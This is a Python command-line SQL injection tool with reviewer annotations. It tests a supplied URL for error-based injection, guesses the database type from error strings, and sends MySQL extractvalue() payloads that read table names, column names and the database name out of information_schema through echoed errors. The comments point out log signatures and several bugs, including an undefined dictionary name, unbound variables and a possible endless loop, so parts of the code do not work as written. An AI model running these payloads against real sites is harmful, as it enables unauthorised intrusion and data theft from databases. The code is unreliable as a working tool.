"""Command-line helper that probes a URL for error-based SQL injection.

Every branch of ``Main`` appends a literal SQL fragment to the URL string the
user passed on the command line, issues a plain ``requests.get`` against it,
and then string-searches the response body for DBMS error messages.  Nothing
is parsed structurally: the ``BeautifulSoup`` objects that are created are
never read, and results are located with ``str.find`` on the raw HTML.

Module-level state: ``args`` (the parsed ``argparse`` namespace) is created
only inside the ``__main__`` guard, and ``Main`` reads it as a global.
"""
import requests, argparse
from bs4 import BeautifulSoup as BS

# http://www.securityidiots.com/Web-Pentest/SQL-Injection/XPATH-Error-Based-Injection-Extractvalue.html
# (The original header also listed four specific third-party hosts as example
# targets; they were removed in review and are not needed to read the code.)

def Main(test, get_database_type, dbname, tablenames, dump, columns, colum_name):
    """Dispatch on the parsed CLI options and run one probe against the given URL.

    Parameters
    ----------
    test, get_database_type, dbname, tablenames, dump, columns, colum_name
        Mirror the ``argparse`` options of the same names.  NOTE: none of them
        is read here -- every branch reads the module-global ``args`` instead,
        so calling ``Main`` outside the ``__main__`` block raises ``NameError``.

    Returns
    -------
    None.  All output goes to stdout via ``print``.

    Branch order matters: ``test`` wins over ``dump``, which wins over
    ``tablenames``, ``columns``, ``dbname`` and ``get_database_type``; only
    the first truthy option is acted on.
    """
    if args.test:
        # One request per suffix.  From a detection standpoint these suffixes
        # (a quote, a double quote, a parenthesis, quote-parenthesis pairs, an
        # asterisk) appended to an otherwise normal query string are the
        # signature this probe leaves in access logs.  ``args.test[:-4]`` drops
        # the last four characters of the URL before appending ';' -- the
        # reason is not visible here.
        urls = [args.test + "'", args.test + '"', args.test[:-4] + ';', args.test + ")", args.test + "')", args.test + '")', args.test + '*']
        # Substrings whose presence in the response body is taken as a sign of
        # an unhandled database error.  Note that generic PHP strings such as
        # 'Warning: ' and 'Notice: ' are in the list, so any PHP warning in the
        # page body is reported as "vulnerable".
        vulnerable_text = ['MySQL Query fail:', '/www/htdocs/', 'Query failed', 'mysqli_fetch_array()', 'mysqli_result', 'Warning: ', 'MySQL server', 'SQL syntax', 'You have an error in your SQL syntax;', 'mssql_query()', "Incorrect syntax near '='", 'mssql_num_rows()', 'Notice: ']
        try:
            for url in urls:
                results = requests.get(url)
                data = results.text
                # ``soup`` and ``string`` are assigned but never used.
                soup = BS(data, features='html.parser')
                for vuln in vulnerable_text:
                    if vuln in data:
                        string = vuln
                        vulnerable = True
                # ``vulnerable`` is only ever bound when a substring matched;
                # when nothing matched this line raises ``NameError``, which
                # the bare ``except`` below turns into the "not vulnerable"
                # message.  (Indentation of this check was lost in the source
                # listing; it is placed inside the URL loop here.)
                if vulnerable:
                    print('Site is vulnerable!')
        except:
            # Bare except: network errors, the NameError above, and any other
            # failure are all reported identically.
            print('Site is not vulnerable!')
    elif args.dump:
        # Placeholder only -- no request is made in this branch.
        print('Dumping the database')
    elif args.tablenames:
        print("Extracting tables names...")
        # Appends an extractvalue() payload to the URL and relies on the DBMS
        # error text being echoed back in the page.
        link = str(args.tablenames) + " and extractvalue(1,(select%20group_concat(table_name) from%20information_schema.tables where table_schema=database()))"
        results = requests.get(link)
        data = results.text
        # Locate the echoed error message, skip 8 characters past 'error: ',
        # and take everything up to the next single quote.  If 'error: ' is
        # absent, ``find`` returns -1 and the slices below operate on the
        # last character of the page rather than on an error message.
        str_num = str(data).find('error: ')
        str1_num = data[str_num:]
        str1 = str1_num[8:]
        str2 = str1.find('\'')
        str3 = str1[:str2]
        print(f"\nTable names: {str3}")
    elif args.columns:
        print('Extracting Columns...')
        # ``args.colum_name`` is concatenated directly into the payload; it is
        # None when ``-cn`` was not given, which makes this ``+`` raise
        # ``TypeError`` before any request is sent.
        link = str(args.columns) + " and extractvalue(0x0a,concat(0x0a,(select column_name from information_schema.columns where table_schema=database() and table_name='" + args.colum_name + "'limit 0,1)))--"
        results = requests.get(link)
        data = results.text

        # Unlike the other branches, the whole response body is printed.
        print(f"Column names: {data}")
    elif args.dbname:
        link = args.dbname + " and extractvalue(1,concat(1,(select database()))) --" # " and extractvalue(0x0a,concat(0x0a,(select database())))--"
        # Debug output: the full request URL and the offset of 'error:'.
        print(link)
        results = requests.get(link)
        data = results.text
        # Same slice-based extraction as the tablenames branch, but searching
        # for 'error:' (no trailing space) while still skipping 8 characters.
        str_num = str(data).find('error:')
        print(str_num)
        str1_num = data[str_num:]
        str1 = str1_num[8:]
        str2 = str1.find('\'')
        str3 = str1[:str2]
        # This is the only branch that checks the ``find`` result before
        # reporting; the slicing above still runs unconditionally.
        if str_num == -1:
            print('Access Denied')
        else:
            print(f"Database name: {str3}")
    elif args.get_database_type:
        # Same suffix list as the ``test`` branch.
        urls = [args.get_database_type + "'", args.get_database_type + '"', args.get_database_type[:-4] + ';', args.get_database_type + ")", args.get_database_type + "')", args.get_database_type + '")', args.get_database_type + '*']
        # Error-message fragments grouped by the DBMS they are attributed to.
        # The attribution is the author's; e.g. 'mssql_query()' and
        # 'mssql_num_rows()' are PHP MSSQL function names but sit under MySQL.
        db_dict = {
            "MySQL": [
                'MySQL', 'MySQL Query fail:', 'SQL syntax', 'You have an error in your SQL syntax', 'mssql_query()', 'mssql_num_rows()',
                '1064 You have an error in your SQL syntax'
            ],
            "PostGre": [
                'PostgreSQL query failed', 'Query failed', 'syntax error', 'unterminated quoted string', 'unterminated dollar-quoted string',
                'column not found', 'relation not found', 'function not found'
            ],
            "Microsoft_SQL": [
                'Microsoft SQL Server', 'Invalid object name', 'Unclosed quotation mark', 'Incorrect syntax near', 'SQL Server error',
                'The data types ntext and nvarchar are incompatible'
            ],
            "Oracle": [
                'ORA-', 'Oracle error', 'PLS-', 'invalid identifier', 'missing expression', 'missing keyword', 'missing right parenthesis',
                'not a valid month'
            ],
            "Advantage_Database": [
                'AdsCommandException', 'AdsConnectionException', 'AdsException', 'AdsExtendedReader', 'AdsDataReader', 'AdsError'
            ],
            "Firebird": [
                'Dynamic SQL Error', 'SQL error code', 'arithmetic exception', 'numeric value is out of range', 'malformed string',
                'Invalid token'
            ]
        }
        DBFound = 0
        DBType = ''
        try:
            for url in urls:
                results = requests.get(url)
                data = results.text
                # ``soup`` is created but never used.
                soup = BS(data, features='html.parser')
                # ``DBDict`` is not defined anywhere in this file (the dict
                # above is ``db_dict``), so the first iteration raises
                # ``NameError`` and control goes to the bare ``except`` below.
                # Were the name resolved, note that ``while not DBFound`` has
                # no other exit: the ``break`` leaves only the innermost
                # ``for``, and the loop repeats until ``DBFound`` is set.
                while not DBFound:
                    for db, identifiers in DBDict.items():
                        for dbid in identifiers:
                            if dbid in data:
                                DBType = db
                                DBFound = 1
                                print(DBType)
                                break
        except:
            # Bare except: the NameError above and any network failure both
            # end here.
            print('Database type: Unknown')
    else:
        print('Invalid Argument given!')

if __name__ == '__main__':
    # ``parser`` is created and never used; ``ap`` is the real parser.
    parser = argparse.ArgumentParser(description='SQL Injection Assistent')
    ap = argparse.ArgumentParser(prog='sql.py', usage='%(prog)s [options] -t ', description='SQL Injection Assistent')
    ap.add_argument('-t', '--test', type=str, help='Test Target for SQLI Vulnerablities')
    ap.add_argument('-gdt', '--get_database_type', type=str, help='Find backend DB type')
    ap.add_argument('-dbn', '--dbname', type=str, help='Get database name')
    ap.add_argument('-tn', '--tablenames', type=str, help='Get table names')
    ap.add_argument('-c', '--columns', type=str, help="Get Column names")
    ap.add_argument('-cn', '--colum_name', type=str, help='Column Name')
    # Declared with ``type=str`` like the others, but ``Main`` only prints a
    # placeholder for it.
    ap.add_argument('-d', '--dump', type=str, help="Dump the Database")
    # ``args`` becomes the module global that ``Main`` actually reads.
    args = ap.parse_args()
    # The individual locals below are passed to ``Main`` but ignored there.
    test = args.test
    dbname = args.dbname
    tablenames = args.tablenames
    dump = args.dump
    columns = args.columns
    colum_name = args.colum_name
    get_database_type = args.get_database_type
    Main(test, get_database_type, dbname, tablenames, dump, columns, colum_name)